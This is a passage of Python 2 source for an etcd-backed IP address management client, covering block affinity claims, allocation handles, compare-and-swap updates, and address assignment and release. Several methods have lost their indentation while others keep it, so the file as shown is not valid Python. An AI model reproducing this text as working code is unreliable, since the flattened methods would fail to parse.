                                           quorum=True,
                                           recursive=True).leaves
            for child in result:
                packed = child.key.split("/")
                # Affinity keys split into 9 segments; segment 5 holds the
                # host name, segment 8 the encoded block CIDR.
                # TODO confirm against the IPAM_HOSTS_PATH layout.
                if len(packed) == 9:
                    # block_ids are encoded 192.168.1.0/24 -> 192.168.1.0-24
                    # in etcd.
                    host = packed[5]
                    block_id = IPNetwork(packed[8].replace("-", "/"))
                    if block_id in pool:
                        hosts_and_blocks.append((host, block_id))
        except EtcdKeyNotFound:
            # Means the path is empty.
            pass
        return hosts_and_blocks
    def _new_affine_block(self, host, version, pool, ipam_config):
        """
        Create and register a new affine block for the host.

        :param host: The host ID to get a block for.
        :param version: 4 for IPv4, 6 for IPv6.
        :param pool: Limit blocks to a specific pool, or pass None to find all
        blocks for the specified version.
        :param ipam_config: The global IPAM configuration.
        :return: The block CIDR of the new block.
        :raises PoolNotFound: if the requested pool is not configured.
        :raises NoFreeBlocksError: if every candidate block is already claimed.
        """
        # Get the pools and verify we got a valid one, or none.
        ip_pools = self.get_ip_pools(version, ipam=True, include_disabled=False)
        if pool is not None:
            if pool not in ip_pools:
                # NOTE(review): this message concatenation is missing a space
                # ("...haswrong attributes") — fix the literal separately.
                raise PoolNotFound("Requested pool %s is not configured or has"
                                   "wrong attributes" % pool)
            # Confine search to only the one pool.
            ip_pools = [pool]
        for pool in ip_pools:
            # Walk every block-sized subnet of the pool looking for one with
            # no entry in the datastore.
            for block_cidr in pool.cidr.subnet(BLOCK_PREFIXLEN[version]):
                block_id = str(block_cidr)
                _log.debug("Checking if block %s is free.", block_id)
                key = _block_datastore_key(block_cidr)
                try:
                    _ = self.etcd_client.read(key, quorum=True)
                except EtcdKeyNotFound:
                    _log.debug("Found block %s free.", block_id)
                    try:
                        self._claim_block_affinity(host, block_cidr,
                                                   ipam_config)
                    except HostAffinityClaimedError:
                        # Failed to claim the block because some other host
                        # has it.
                        _log.debug("Failed to claim block %s", block_cidr)
                        continue
                    # Success!
                    return block_cidr
        raise NoFreeBlocksError()
    def _claim_block_affinity(self, host, block_cidr, ipam_config):
        """
        Claim a block we think is free.

        :param host: The host ID to get a block for.
        :param block_cidr: The block CIDR.
        :param ipam_config: The global IPAM configuration.
        :raises HostAffinityClaimedError: if another host claimed the block
            first.
        """
        # Write the host-affinity marker key first; the block itself is the
        # source of truth, so a stray marker is harmless if we lose the race.
        key = _block_host_key(host, block_cidr)
        self.etcd_client.write(key, "")
        # Create the block.
        block = AllocationBlock(block_cidr, host,
                                ipam_config.strict_affinity)
        try:
            self._compare_and_swap_block(block)
        except CASError:
            # Block exists. Read it back to find out its host affinity
            block = self._read_block(block_cidr)
            if block.host_affinity == host:
                # Block is now claimed by us. Some other process on this host
                # must have claimed it.
                _log.debug("Block %s already claimed by us. Success.",
                           block_cidr)
                return
            # Some other host beat us to claiming this block. Clean up.
            try:
                self.etcd_client.delete(key)
            except EtcdKeyNotFound:
                # A race exists where another process on the same host could
                # have already deleted the key. This is fine as long as the key
                # no longer exists.
                pass
            # Throw a HostAffinityClaimedError to let the caller know the block
            # wasn't free after all.
            raise HostAffinityClaimedError("Block %s already claimed by %s",
                                           block_cidr, block.host_affinity)
        # successfully created the block. Done.
        return
    def _release_block_affinity(self, host, block_cidr):
        """
        Release a block we think is owned by the specified host.

        If there are no IPs assigned in the block then delete the block. If
        there are IPs assigned, remove affinity of the block from the host.

        Raises HostAffinityClaimedError if the block is claimed by a
        different host.
        Raises KeyError if the block does not exist.
        """
        # xrange: this module targets Python 2.
        for _ in xrange(RETRIES):
            block = self._read_block(block_cidr)
            if block.host_affinity != host:
                _log.info("Block host affinity is %s (expected %s) - not "
                          "releasing", block.host_affinity, host)
                raise HostAffinityClaimedError(
                    "Block %s is claimed by %s",
                    block_cidr, block.host_affinity)
            try:
                if block.is_empty():
                    # The block is empty, so just delete the block.
                    _log.debug("Block is empty - delete block")
                    self._delete_block(block)
                else:
                    # The block is not empty so remove affinity from the block.
                    # This prevents the host automatically assigning from this
                    # block unless we are allowed to overflow into non-affine
                    # blocks when affine blocks are exhausted, and provided the
                    # block is still valid (i.e has a corresponding IP Pool).
                    block.host_affinity = None
                    self._compare_and_swap_block(block)
            except CASError:
                # CAS failed. Retry.
                continue
            # We removed or updated the block successfully, so update the host
            # configuration to remove the CIDR.
            _log.debug("Removed affinity for block - deleting host key.")
            key = _block_host_key(host, block_cidr)
            try:
                self.etcd_client.delete(key)
            except EtcdKeyNotFound:
                # Already gone - nothing to clean up.
                pass
            return
        raise RuntimeError("Max retries hit.")  # pragma: no cover
    def _random_blocks(self, excluded_ids, version, pool):
        """
        Get a list of block CIDRs, in random order.

        :param excluded_ids: List of IDs that should be excluded.
        :param version: The IP version 4, or 6.
        :param pool: IPPool to get blocks from, or None to use all pools
        :return: A randomly-ordered list of block CIDRs.
        :raises PoolNotFound: if the requested pool is not configured.
        """
        # Get the pools and verify we got a valid one, or none.
        ip_pools = self.get_ip_pools(version, ipam=True, include_disabled=False)
        if pool is not None:
            if pool not in ip_pools:
                # NOTE(review): this message concatenation is missing a space
                # ("...haswrong attributes") — fix the literal separately.
                raise PoolNotFound("Requested pool %s is not configured or has"
                                   "wrong attributes" % pool)
            # Confine search to only the one pool.
            ip_pools = [pool]
        random_blocks = []
        i = 0
        for pool in ip_pools:
            for block_cidr in pool.cidr.subnet(BLOCK_PREFIXLEN[version]):
                if block_cidr not in excluded_ids:
                    # add this block. We use an "inside-out" Fisher-Yates
                    # shuffle to randomize the list as we create it. See
                    # http://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle
                    j = random.randint(0, i)
                    if j != i:
                        random_blocks.append(random_blocks[j])
                        random_blocks[j] = block_cidr
                    else:
                        random_blocks.append(block_cidr)
                    i += 1
        return random_blocks
    def _increment_handle(self, handle_id, block_cidr, amount):
        """
        Increment the allocation count on the given handle for the given block
        by the given amount.

        Creates the handle if it does not yet exist.
        """
        for _ in xrange(RETRIES):
            try:
                handle = self._read_handle(handle_id)
            except KeyError:
                # handle doesn't exist. Create it.
                handle = AllocationHandle(handle_id)
            _ = handle.increment_block(block_cidr, amount)
            try:
                self._compare_and_swap_handle(handle)
            except CASError:
                # CAS failed. Retry.
                continue
            else:
                # success!
                return
        raise RuntimeError("Max retries hit.")  # pragma: no cover
    def _decrement_handle(self, handle_id, block_cidr, amount):
        """
        Decrement the allocation count on the given handle for the given block
        by the given amount.

        :raises KeyError: if the handle does not exist (indicates datastore
            corruption).
        :raises AddressCountTooLow: if the handle records fewer than amount
            addresses for the block (also indicates corruption).
        """
        for _ in xrange(RETRIES):
            try:
                handle = self._read_handle(handle_id)
            except KeyError:
                # This is bad. The handle doesn't exist, which means something
                # really wrong has happened, like DB corruption.
                _log.error("Can't decrement block %s on handle %s; it doesn't "
                           "exist.", str(block_cidr), handle_id)
                raise
            try:
                handle.decrement_block(block_cidr, amount)
            except AddressCountTooLow:
                # This is also bad. The handle says it has fewer than the
                # requested amount of addresses allocated on the block. This
                # means the DB is corrupted.
                _log.error("Can't decrement block %s on handle %s; too few "
                           "allocated.", str(block_cidr), handle_id)
                raise
            try:
                self._compare_and_swap_handle(handle)
            except CASError:
                # Concurrent update - re-read and retry.
                continue
            else:
                # Success!
                return
        raise RuntimeError("Max retries hit.")  # pragma: no cover
def _read_handle(self, handle_id):
"""
Read the handle with the given handle ID from the data store.
:param handle_id: The handle ID to read.
:return: AllocationHandle object.
"""
key = _handle_datastore_key(handle_id)
try:
result = self.etcd_client.read(key, quorum=True)
except EtcdKeyNotFound:
raise KeyError(handle_id)
handle = AllocationHandle.from_etcd_result(result)
return handle
    def _compare_and_swap_handle(self, handle):
        """
        Write the handle using an atomic Compare-and-swap.

        An empty pre-existing handle is deleted rather than updated; empty
        handles are never written.

        :raises CASError: on concurrent modification.
        """
        # If the handle has a db_result, CAS against that.
        if handle.db_result is not None:
            _log.debug("Handle %s exists.", handle.handle_id)
            if handle.is_empty():
                # Handle is now empty. Delete it instead of an update.
                _log.debug("Handle %s is empty.", handle.handle_id)
                key = _handle_datastore_key(handle.handle_id)
                try:
                    self.etcd_client.delete(
                        key,
                        prevIndex=handle.db_result.modifiedIndex)
                except EtcdCompareFailed:
                    raise CASError(handle.handle_id)
            else:
                _log.debug("Handle %s is not empty.", handle.handle_id)
                try:
                    self.etcd_client.update(handle.update_result())
                except EtcdCompareFailed:
                    raise CASError(handle.handle_id)
        else:
            # Never read from etcd, so this is a brand-new handle.
            _log.debug("CAS Write new handle %s", handle.handle_id)
            assert not handle.is_empty(), "Don't write empty handle."
            key = _handle_datastore_key(handle.handle_id)
            value = handle.to_json()
            try:
                self.etcd_client.write(key, value, prevExist=False)
            except EtcdAlreadyExist:
                raise CASError(handle.handle_id)
    def _read_blocks(self):
        """
        Read all the allocated blocks.

        :return: Tuple of
          (List of IPv4 AllocationBlocks,
           List of IPv6 AllocationBlocks)
        """
        blocks = {}
        for version in (4, 6):
            blocks_path = IPAM_BLOCK_PATH % {"version": version}
            try:
                leaves = self.etcd_client.read(blocks_path,
                                               quorum=True,
                                               recursive=True).leaves
            except EtcdKeyNotFound:
                # Path doesn't exist.
                blocks[version] = []
            else:
                # Convert the leaf values to AllocationBlocks. We need to
                # handle an empty leaf value because when no pools are
                # configured the recursive read returns the parent directory.
                blocks[version] = [AllocationBlock.from_etcd_result(leaf) for leaf in leaves
                                   if leaf.value]
        return blocks[4], blocks[6]
@handle_errors
def get_ipam_config(self):
"""
Return the deployment specific IPAM configuration.
:param host: The host ID of the config to return.
:return: An IPAMConfig object.
"""
try:
result = self.etcd_client.read(IPAM_CONFIG_PATH)
except EtcdKeyNotFound:
_log.debug("No IPAM Config stored - return default")
return IPAMConfig()
else:
return IPAMConfig.from_json(result.value)
    @handle_errors
    def set_ipam_config(self, config):
        """
        Set the deployment-specific IPAM configuration.

        The IPAM configuration may not be changed whilst there are allocation
        blocks configured.

        :param config: An IPAMConfig object.
        :raises IPAMConfigConflictError: if the requested settings conflict
            with each other or with existing allocations.
        """
        assert isinstance(config, IPAMConfig)
        current = self.get_ipam_config()
        if current == config:
            # No-op: nothing to write.
            _log.debug("Configuration has not changed")
            return
        if not config.strict_affinity and not config.auto_allocate_blocks:
            raise IPAMConfigConflictError("Cannot disable 'strict_affinity' "
                                          "and 'auto_allocate_blocks' at the same time.")
        # For simplicity, we do not allow the IPAM configuration to be changed
        # once there are IPAM blocks configured. This is to prevent mismatches
        # in the assignments (e.g. a block is marked as non-strict but the
        # global setting is changed to strict - in this case we should update
        # existing blocks to strict, but without additional information about
        # who owns which IP, it is not possible).
        blocksv4, blocksv6 = self._read_blocks()
        if blocksv4 or blocksv6:
            _log.warning("Cannot change IPAM config while allocations exist")
            raise IPAMConfigConflictError("Unable to change global IPAM "
                                          "configuration due to existing IP allocations.")
        self.etcd_client.write(IPAM_CONFIG_PATH, config.to_json())
class CASError(DataStoreError):
    """Compare-and-swap atomic update failed."""
class NoFreeBlocksError(DataStoreError):
    """Tried to get a new block but there are none available."""
class HostAffinityClaimedError(DataStoreError):
    """Tried to set or remove the host affinity of a block which has affinity
    claimed by a different host.
    """
class IPAMConfigConflictError(DataStoreError):
    """Attempt to change IPAM configuration that conflicts with existing
    allocations.
    """
def _block_datastore_key(block_cidr):
    """
    Translate a block CIDR into a datastore key.

    :param block_cidr: IPNetwork representing the block
    :return: etcd key as a string.
    """
    prefix = IPAM_BLOCK_PATH % {'version': block_cidr.version}
    # '/' can't appear in an etcd key segment: 10.0.0.0/24 -> 10.0.0.0-24.
    return prefix + str(block_cidr).replace("/", "-")
def _block_host_key(host, block_cidr):
    """
    Translate a block CIDR into the host specific block key. Presence of the
    key in the datastore indicates that a host has affinity to a specific
    block. No additional data is stored at this key, the true source is the
    block itself.

    :param host: The host ID the key belongs to.
    :param block_cidr: IPNetwork representing the block
    :return: etcd key as a string.
    """
    prefix = IPAM_HOST_AFFINITY_PATH % {"host": host,
                                        "version": block_cidr.version}
    # Same '/'-to-'-' encoding as _block_datastore_key.
    return prefix + str(block_cidr).replace("/", "-")
def _handle_datastore_key(handle_id):
    """
    Translate a handle_id into a datastore key.

    :param handle_id: String key
    :return: etcd key as string.
    """
    return IPAM_HANDLE_PATH + handle_id
class IPAMClient(BlockHandleReaderWriter):

    @handle_errors
    def auto_assign_ips(self, num_v4, num_v6, handle_id, attributes,
                        pool=(None, None), host=None):
        """
        Automatically pick and assign the given number of IPv4 and IPv6
        addresses.

        :param num_v4: Number of IPv4 addresses to request
        :param num_v6: Number of IPv6 addresses to request
        :param handle_id: allocation handle ID for this request. You can query
        this key using get_assignments_by_handle() or release all addresses
        with this key using release_by_handle().
        :param attributes: Contents of this dict will be stored with the
        assignment and can be queried using get_assignment_attributes(). Must
        be JSON serializable.
        :param pool: (optional) Tuple of (v4 pool, v6 pool); if supplied, the
        pool(s) to assign from. If None, automatically choose a pool.
        :param host: (optional) The host ID to use for affinity in assigning IP
        addresses. Defaults to the hostname returned by get_hostname().
        :return: A tuple of (v4_address_list, v6_address_list). When IPs in
        configured pools are at or near exhaustion, this method may return
        fewer than requested addresses.
        """
        assert isinstance(handle_id, str) or handle_id is None
        host = host or get_hostname()
        _log.info("Auto-assign %d IPv4, %d IPv6 addrs",
                  num_v4, num_v6)
        # Both families share the same handle and attributes; each family is
        # assigned independently by _auto_assign.
        v4_address_list = self._auto_assign(4, num_v4, handle_id, attributes,
                                            pool[0], host)
        _log.info("Auto-assigned IPv4s %s",
                  [str(addr) for addr in v4_address_list])
        v6_address_list = self._auto_assign(6, num_v6, handle_id, attributes,
                                            pool[1], host)
        _log.info("Auto-assigned IPv6s %s",
                  [str(addr) for addr in v6_address_list])
        return v4_address_list, v6_address_list
    def _auto_assign(self, ip_version, num, handle_id,
                     attributes, pool, host):
        """
        Auto assign addresses from a specific IP version.

        Hosts automatically register themselves as the owner of a block the
        first time they request an auto-assigned IP. For auto-assignment, a
        host will allocate from a block it owns, or if all their currently
        owned blocks get full, it will register itself as the owner of a new
        block. If all blocks are owned, and all the host's own blocks are
        full, it will pick blocks at random until it can fulfil the request.
        If you're really, really out of addresses, it will fail the request.

        :param ip_version: 4 or 6, the IP version number.
        :param num: Number of addresses to assign.
        :param handle_id: allocation handle ID for this request.
        :param attributes: Contents of this dict will be stored with the
        assignment and can be queried using get_assignment_attributes(). Must
        be JSON serializable.
        :param pool: (optional) if supplied, the pool to assign from, If None,
        automatically choose a pool.
        :param host: The host ID to use for affinity in assigning IP addresses.
        :return: List of assigned addresses; may be shorter than num when the
        pools are at or near exhaustion.
        """
        assert isinstance(handle_id, str) or handle_id is None

        # Phase 1: assign from blocks this host already has affinity to. We
        # always do strict checking at this stage, so it doesn't matter whether
        # globally we have strict_affinity or not.
        block_list = self._get_affine_blocks(host,
                                             ip_version,
                                             pool)
        block_ids = list(block_list)
        key_errors = 0
        allocated_ips = []
        num_remaining = num
        while num_remaining > 0:
            try:
                block_id = block_ids.pop(0)
            except IndexError:
                _log.info("Ran out of affine blocks for %s in pool %s",
                          host, pool)
                break
            try:
                ips = self._auto_assign_ips_in_block(block_id,
                                                     num_remaining,
                                                     handle_id,
                                                     attributes,
                                                     host)
            except KeyError:
                # In certain rare race conditions, _get_affine_blocks above
                # can return block_ids that don't exist (due to multiple IPAM
                # clients on this host running simultaneously). If that
                # happens, requeue the block_id for a retry, since we expect
                # the other IPAM client to shortly create the block. To stop
                # endless looping we limit the number of KeyErrors that will
                # generate a retry.
                _log.warning("Tried to auto-assign to block %s. Doesn't "
                             "exist.", block_id)
                key_errors += 1
                if key_errors <= KEY_ERROR_RETRIES:
                    _log.debug("Queueing block %s for retry.", block_id)
                    block_ids.append(block_id)
                else:
                    _log.warning("Stopping retry of block %s.", block_id)
                continue
            except NoHostAffinityError:
                # In certain rare race conditions, _get_affine_blocks above
                # can return block_ids that don't actually have affinity to
                # this host (due to multiple IPAM clients on this host running
                # simultaneously). If that happens, just move to the next one.
                _log.warning("No host affinity on block %s; skipping.",
                             block_id)
                continue
            allocated_ips.extend(ips)
            num_remaining = num - len(allocated_ips)

        # If there are still addresses to allocate, then we've run out of
        # blocks with affinity. Before we can assign new blocks or assign in
        # non-affine blocks, we need to check that our IPAM configuration
        # allows that.
        ipam_config = self.get_ipam_config()

        # Phase 2: if we can auto allocate blocks, try to fulfill address
        # request by allocating new blocks.
        if ipam_config.auto_allocate_blocks:
            _log.debug("Attempt to allocate new affine blocks")
            retries = RETRIES
            while num_remaining > 0 and retries > 0:
                retries -= 1
                try:
                    new_block = self._new_affine_block(host,
                                                       ip_version,
                                                       pool,
                                                       ipam_config)
                    # If successful, this creates the block and registers it to
                    # us.
                except NoFreeBlocksError:
                    _log.info("Could not get new host affinity block for %s in "
                              "pool %s", host, pool)
                    break
                ips = self._auto_assign_ips_in_block(new_block,
                                                     num_remaining,
                                                     handle_id,
                                                     attributes,
                                                     host)
                allocated_ips.extend(ips)
                num_remaining = num - len(allocated_ips)
            if retries == 0:  # pragma: no cover
                raise RuntimeError("Hit Max Retries.")

        # Phase 3: if there are still addresses to allocate, we've now tried
        # all blocks with some affinity to us, and tried (and failed) to
        # allocate new ones. If we do not require strict host affinity, our
        # last option is a random hunt through any blocks we haven't yet tried.
        #
        # Note that this processing simply takes all of the IP pools and breaks
        # them up into block-sized CIDRs, then shuffles and searches through each
        # CIDR. This algorithm does not work if we disallow auto-allocation of
        # blocks because the allocated blocks may be sparsely populated in the
        # pools resulting in a very slow search for free addresses.
        #
        # If we need to support non-strict affinity and no auto-allocation of
        # blocks, then we should query the actual allocation blocks and assign
        # from those.
        if not ipam_config.strict_affinity:
            _log.debug("Attempt to allocate from non-affine random block")
            if num_remaining > 0:
                random_blocks = iter(self._random_blocks(block_list,
                                                         ip_version,
                                                         pool))
                while num_remaining > 0:
                    try:
                        # py2-style iterator advance (module targets Python 2;
                        # use next(random_blocks) when porting to py3).
                        block_id = random_blocks.next()
                    except StopIteration:
                        _log.warning("All addresses exhausted in pool %s", pool)
                        break
                    ips = self._auto_assign_ips_in_block(block_id,
                                                         num_remaining,
                                                         handle_id,
                                                         attributes,
                                                         host,
                                                         affinity_check=False)
                    allocated_ips.extend(ips)
                    num_remaining = num - len(allocated_ips)
        return allocated_ips
    def _auto_assign_ips_in_block(self, block_cidr, num, handle_id, attributes,
                                  host, affinity_check=True):
        """
        Automatically pick IPs from a block and commit them to the data store.

        :param block_cidr: The identifier for the block to read.
        :param num: The number of IPs to assign.
        :param handle_id: allocation handle ID for this request.
        :param attributes: Contents of this dict will be stored with the
        assignment and can be queried using get_assignment_attributes(). Must
        be JSON serializable.
        :param host: The host ID to use for affinity in assigning IP addresses.
        :param affinity_check: True to enable checking the host has the
        affinity to the block, False to disable this check, for example, while
        randomly searching after failure to get affine block.
        :return: List of assigned IPs, or [] if the block is full.
        """
        assert isinstance(handle_id, str) or handle_id is None
        _log.debug("Auto-assigning from block %s", block_cidr)
        # Optimistic-concurrency loop: re-read the block and retry whenever
        # the compare-and-swap write below loses a race to another writer.
        for i in xrange(RETRIES):
            _log.debug("Auto-assign from %s, retry %d", block_cidr, i)
            block = self._read_block(block_cidr)
            # Candidate addresses are chosen in-memory only; nothing is
            # persisted until the CAS write succeeds, hence "unconfirmed".
            unconfirmed_ips = block.auto_assign(num=num,
                                                handle_id=handle_id,
                                                attributes=attributes,
                                                host=host,
                                                affinity_check=affinity_check)
            if len(unconfirmed_ips) == 0:
                _log.debug("Block %s is full.", block_cidr)
                return []
            # If using a handle, increment the handle by the number of
            # confirmed IPs.  This happens *before* the CAS write and is
            # rolled back below if that write fails.
            if handle_id is not None:
                self._increment_handle(handle_id,
                                       block_cidr,
                                       len(unconfirmed_ips))
            try:
                self._compare_and_swap_block(block)
            except CASError:
                # Lost the write race: undo the handle bump and loop to
                # re-read the block and try again.
                _log.debug("CAS failed on block %s", block_cidr)
                if handle_id is not None:
                    self._decrement_handle(handle_id,
                                           block_cidr,
                                           len(unconfirmed_ips))
            else:
                return unconfirmed_ips
        raise RuntimeError("Hit Max Retries.")
    @handle_errors
    def assign_ip(self, address, handle_id, attributes, host=None):
        """
        Assign the given address.  Throws AlreadyAssignedError if the address
        is taken.  If the strict_affinity option is set to True, this
        throws a NoHostAffinityError if the address is in a block owned by a
        different host.

        :param address: IPAddress to assign.
        :param handle_id: allocation handle ID for this request.  You can
        query this key using get_assignments_by_handle() or release all
        addresses with this handle_id using release_by_handle().
        :param attributes: Contents of this dict will be stored with the
        assignment and can be queried using get_assignment_attributes(). Must
        be JSON serializable.
        :param host: (optional) The host ID to use for affinity in assigning IP
        addresses.  Defaults to the hostname returned by get_hostname().
        :return: None.
        """
        assert isinstance(handle_id, str) or handle_id is None
        assert isinstance(address, IPAddress)
        host = host or get_hostname()
        block_cidr = get_block_cidr_for_address(address)
        # Lazily fetched below, only if we need to create the block.
        ipam_config = None
        # Optimistic-concurrency loop: retry on CAS conflicts and on races
        # to create the covering block.
        for _ in xrange(RETRIES):
            try:
                block = self._read_block(block_cidr)
            except KeyError:
                # The covering block doesn't exist yet.  Create and claim it
                # (if the address is inside a configured pool), then retry.
                _log.debug("Block %s doesn't exist.", block_cidr)
                if self._validate_cidr_in_pools(block_cidr):
                    _log.debug("Create and claim block %s.",
                               block_cidr)
                    # We need the IPAM config, so get it once now.
                    if ipam_config is None:
                        _log.debug("Querying IPAM config")
                        ipam_config = self.get_ipam_config()
                    try:
                        self._claim_block_affinity(host, block_cidr,
                                                   ipam_config)
                    except HostAffinityClaimedError:
                        # Raced with another host; the block exists now, so
                        # just retry the assignment against it.
                        _log.debug("Someone else claimed block %s before us.",
                                   block_cidr)
                        continue
                    # Block exists now, retry writing to it.
                    _log.debug("Claimed block %s", block_cidr)
                    continue
                else:
                    raise PoolNotFound("%s is not in any configured pool" %
                                       address)
            # Try to assign.  Throws AlreadyAssignedError if already assigned,
            # or a NoHostAffinityError if the block requires strict host
            # affinity and the host affinity does not match the host.
            block.assign(address, handle_id, attributes, host)
            # If using a handle, increment by one IP.  This happens before
            # the CAS write and is rolled back below if the write fails.
            if handle_id is not None:
                self._increment_handle(handle_id, block_cidr, 1)
            # Try to commit.
            try:
                self._compare_and_swap_block(block)
                return  # Success!
            except CASError:
                _log.debug("CAS failed on block %s", block_cidr)
                if handle_id is not None:
                    self._decrement_handle(handle_id,
                                           block_cidr,
                                           1)
        raise RuntimeError("Hit max retries.")
@handle_errors
def release_ips(self, addresses):
"""
Release the given addresses.
:param addresses: Set of IPAddresses to release (ok to mix IPv4 and
IPv6).
:return: Set of addresses that were already unallocated.
"""
assert isinstance(addresses, (set, frozenset))
_log.info("Releasing addresses %s", [str(addr) for addr in addresses])
unallocated = set()
# sort the addresses into blocks
addrs_by_block = {}
for address in addresses:
block_cidr = get_block_cidr_for_address(address)
addrs = addrs_by_block.setdefault(block_cidr, set())
addrs.add(address)
# loop through blocks, CAS releasing.
for block_cidr, addresses in addrs_by_block.iteritems():
unalloc_block = self._release_ips_from_block(block_cidr, addresses)
unallocated = unallocated.union(unalloc_block)
return unallocated
def _release_ips_from_block(self, block_cidr, addresses):
"""
Release the given addresses from the block, using compare-and-swap to
write the block.
:param block_cidr: IPNetwork identifying the block
:param addresses: List of addresses to release.
:return: List of addresses that were already unallocated.
"""
_log.debug("Releasing %d adddresses from block %s",
len(addresses), block_cidr)
for _ in xrange(RETRIES):
try:
block = self._read_block(block_cidr)
except KeyError:
_log.debug("Block %s doesn't exist.", block_cidr)
# OK to return, all addresses must be released already.
return addresses
(unallocated, handles) = block.release(addresses)
assert len(unallocated) <= len(addresses)
if len(unallocated) == len(addresses):
# All the addresses are already unallocated.
return addresses
# Try to commit
try:
# If the block is now empty and there is no host affinity to
# the block then delete the block, otherwise just update the
# block configuration.
if block.is_empty() and not block.host_affinity:
_log.debug("Deleting empty non-affine block")
self._delete_block(block)
else:
_log.debug("Updating assignments in block")
self._compare_and_swap_block(block)
except CASError:
continue
else:
# Success! Decrement handles.
for handle_id, amount in handles.iteritems():
if handle_id is not None:
# Skip the None handle, it's a special value meaning
# the addresses were not allocated with a handle.
self._decrement_handle(handle_id, block_cidr, amount)
return unallocated
raise RuntimeError("Hit Max retries.") # pragma: no cover
def _validate_cidr_in_pools(self, cidr):
"""
Validate a CIDR is fully covered by one of the configured IP pools.
Raises a PoolNotFound exception if the CIDR is not valid.
:param cidr: (IPNetwork) The CIDR to check.
"""
pools = self.get_ip_pools(cidr.version, ipam=True, include_disabled=False)
return any([cidr in pool for pool in pools])
@handle_errors
def get_ip_assignments_by_handle(self, handle_id):
"""
Return a list of IPAddresses assigned to the key.
:param handle_id: Key to query e.g. used on assign_ip() or
auto_assign_ips().
:return: List of IPAddresses
"""
assert isinstance(handle_id, str)
handle = self._read_handle(handle_id) # Can throw KeyError, let it.
ip_assignments = []
for block_str in handle.block:
block_cidr = IPNetwork(block_str)
try:
block = self._read_block(block_cidr)
except KeyError:
_log.warning("Couldn't read block %s referenced in handle %s.",
block_str, handle_id)
continue
ips = block.get_ip_assignments_by_handle(handle_id)
ip_assignments.extend(ips)
return ip_assignments
@handle_errors
def release_ip_by_handle(self, handle_id):
"""
Release all addresses assigned to the key.
:param handle_id: Key to query, e.g. used on assign_ip() or
auto_assign_ips().
:return: None.
"""
assert isinstance(handle_id, str)
handle = self._read_handle(handle_id) # Can throw KeyError, let it.
# Loop through blocks, releasing.
for block_str in handle.block:
block_cidr = IPNetwork(block_str)
self._release_ip_by_handle_block(handle_id, block_cidr)
    def _release_ip_by_handle_block(self, handle_id, block_cidr):
        """
        Release all address in a block with the given handle ID.

        :param handle_id: The handle ID to find addresses with.
        :param block_cidr: The block to release addresses on.
        :return: None
        """
        # Optimistic-concurrency loop: retry on CAS conflicts.
        for _ in xrange(RETRIES):
            try:
                block = self._read_block(block_cidr)
            except KeyError:
                # Block doesn't exist, so all addresses are already
                # unallocated.  This can happen if the handle is
                # overestimating the number of assigned addresses, which is a
                # transient, but expected condition.
                return
            num_release = block.release_by_handle(handle_id)
            if num_release == 0:
                # Block didn't have any addresses with this handle, so all
                # addresses are already unallocated.  This can happen if the
                # handle is overestimating the number of assigned addresses,
                # which is a transient, but expected condition.
                return
            try:
                self._compare_and_swap_block(block)
            except CASError:
                # Failed to update, retry.
                continue
            # Successfully updated block, update the handle if necessary.
            if handle_id is not None:
                # Skip the None handle, it's a special value meaning
                # the addresses were not allocated with a handle.
                self._decrement_handle(handle_id, block_cidr, num_release)
            return
        raise RuntimeError("Hit Max retries.")  # pragma: no cover
@handle_errors
def get_assignment_attributes(self, address):
"""
Return the attributes of a given address.
:param address: IPAddress to query.
:return: The attributes for the address as passed to auto_assign() or
assign().
"""
assert isinstance(address, IPAddress)
block_cidr = get_block_cidr_for_address(address)
try:
block = self._read_block(block_cidr)
except KeyError:
_log.warning("Couldn't read block %s for requested address %s",
block_cidr, address)
raise AddressNotAssignedError("%s is not assigned." % address)
else:
_, attributes = block.get_attributes_for_ip(address)
return attributes
    @handle_errors
    def claim_affinity(self, cidr, host=None):
        """
        Claim affinity for the blocks covered by the requested CIDR.

        :param cidr: The CIDR covering the blocks to be claimed.  Raises a
        InvalidBlockSizeError if the CIDR is smaller than the minimum allowable
        block size.
        :param host: (optional) The host ID to use for affinity in assigning IP
        addresses.  Defaults to the hostname returned by get_hostname().
        :return: A tuple of:
          ([IPNetwork<blocks claimed>],
           [IPNetwork<blocks that were claimed by another host>])
        """
        assert isinstance(cidr, IPNetwork)
        if not validate_block_size(cidr):
            _log.info("Requested CIDR %s is too small", cidr)
            raise InvalidBlockSizeError("The requested CIDR is smaller than "
                                        "the minimum block size.")
        host = host or get_hostname()
        if not self._validate_cidr_in_pools(cidr):
            _log.info("Requested CIDR %s is not in a configured pool", cidr)
            raise PoolNotFound("Requested CIDR is not in a configured IP "
                               "Pool.")
        claimed = []
        unclaimed = []
        # Get the IPAM configuration.  We need this when claiming block
        # affinities.
        ipam_config = self.get_ipam_config()
        for block_cidr in cidr.subnet(BLOCK_PREFIXLEN[cidr.version]):
            try:
                self._claim_block_affinity(host, block_cidr, ipam_config)
            except HostAffinityClaimedError:
                # NOTE(review): the first conflicting block stops the loop,
                # so any later blocks in the CIDR are neither claimed nor
                # reported in `unclaimed` - confirm this is intentional.
                unclaimed.append(block_cidr)
                break
            else:
                claimed.append(block_cidr)
        return claimed, unclaimed
    @handle_errors
    def release_affinity(self, cidr, host=None):
        """
        Release affinity for the blocks covered by the requested CIDR.

        :param cidr: The CIDR covering the blocks to be released.  Raises a
        InvalidBlockSizeError if the CIDR is smaller than the minimum allowable
        block size.
        :param host: (optional) The host ID to compare against the affinity of
        each block that is being released.  Defaults to the hostname returned
        by get_hostname().
        :return: A tuple of:
          ([IPNetwork<blocks released>],
           [IPNetwork<blocks that were not claimed>],
           [IPNetwork<blocks that were claimed by another host>])
        """
        assert isinstance(cidr, IPNetwork)
        if not validate_block_size(cidr):
            _log.info("Requested CIDR %s is too small", cidr)
            raise InvalidBlockSizeError("The requested CIDR is smaller than "
                                        "the minimum block size.")
        host = host or get_hostname()
        released = []
        not_claimed = []
        claimed_by_other = []
        # Classify every block in the CIDR by the outcome of its release.
        for block_cidr in cidr.subnet(BLOCK_PREFIXLEN[cidr.version]):
            try:
                self._release_block_affinity(host, block_cidr)
            except HostAffinityClaimedError:
                claimed_by_other.append(block_cidr)
            except KeyError:
                # No affinity recorded for this block.
                not_claimed.append(block_cidr)
            else:
                released.append(block_cidr)
        return released, not_claimed, claimed_by_other
@handle_errors
def release_host_affinities(self, host):
"""
Release affinities for all blocks owned by the host.
:param host: (optional) The host ID to compare against the affinity of
each block that is being released.
"""
host = host or get_hostname()
# Find all of the affine blocks that are listed for the host, and
# release affinity for each. Note that the host may over-estimate
# which blocks it has affinity for so ignore any error indicating that
